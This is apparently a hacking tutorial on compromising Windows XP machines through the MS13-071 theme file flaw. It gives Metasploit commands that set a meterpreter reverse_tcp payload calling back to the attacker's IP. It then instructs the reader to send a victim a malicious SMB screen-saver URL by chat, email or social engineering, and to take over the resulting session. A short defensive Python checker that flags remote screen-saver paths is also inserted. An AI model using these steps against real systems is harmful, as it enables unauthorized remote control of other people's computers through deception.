Hack PC in Network Using Microsoft Windows Theme File Handling Arbitrary Code Execution

This Metasploit module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path in the [boot] section. An arbitrary path can be used as the screen saver, including a remote SMB resource, which allows remote code execution when a malicious .theme file is opened and the "Screen Saver" tab is viewed.
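
A defensive check for the condition described above, as an added example that is not part of the original post or of the Metasploit module: it parses a .theme file and flags a [boot] screen saver entry that points at a UNC or URL path instead of a local system file. It assumes the screen saver key is named SCRNSAVE.EXE; the sample themes, host name and file names are constructed.

```python
import configparser
import re

# Constructed sample inputs; the host and file names are placeholders.
LOCAL_THEME = r"""
[Theme]
DisplayName=Constructed local sample

[boot]
SCRNSAVE.EXE=%WinDir%\System32\logon.scr
"""
REMOTE_THEME = r"""
[Theme]
DisplayName=Constructed remote sample

[Boot]
ScrnSave.exe=\\fileserver.example\share\sample.scr
"""

UNC_RE = re.compile(r'^"?(\\\\|//)[^\\/]')                 # \\host\share or //host/share
URL_RE = re.compile(r'^"?[a-z][a-z0-9+.-]*://', re.I)      # file://, http://, ...
SYSTEM_RE = re.compile(r'^"?(%(windir|systemroot)%|[a-z]:\\windows)\\', re.I)


def screensaver_path(theme_text):
    """Return the SCRNSAVE.EXE value of the [boot] section, or None."""
    parser = configparser.ConfigParser(interpolation=None, strict=False,
                                       delimiters=("=",), allow_no_value=True)
    parser.read_string(theme_text)
    for section in parser.sections():          # section names are case-sensitive
        if section.strip().lower() == "boot":
            value = parser.get(section, "scrnsave.exe", fallback=None)
            if value:
                return value.strip()
    return None


def classify(theme_text):
    """Return (verdict, path): remote, local-system, review, or none."""
    path = screensaver_path(theme_text)
    if path is None:
        return ("none", None)
    if UNC_RE.match(path) or URL_RE.match(path):
        return ("remote", path)
    if SYSTEM_RE.match(path):
        return ("local-system", path)
    return ("review", path)


if __name__ == "__main__":
    for name, text in (("local", LOCAL_THEME), ("remote", REMOTE_THEME)):
        print(name, classify(text))
```

A "remote" verdict is the case the paragraph describes; "review" marks a local path outside the Windows directory that deserves a manual look.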

Exploit Targets
Windows XP SP 3

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/fileformat/ms13_071_theme
msf exploit (ms13_071_theme)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_071_theme)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (ms13_071_theme)>set srvhost 192.168.1.3
msf exploit (ms13_071_theme)>exploit 

Now you should give the URL \\192.168.1.3:\gCzJXDK\tJugDsVFC.scr to your victim via chat, email, or any social engineering technique.




Now you have access to the victim's PC. Use “sessions -l” and the session number to connect to the session. Now type “sessions -i ID”.
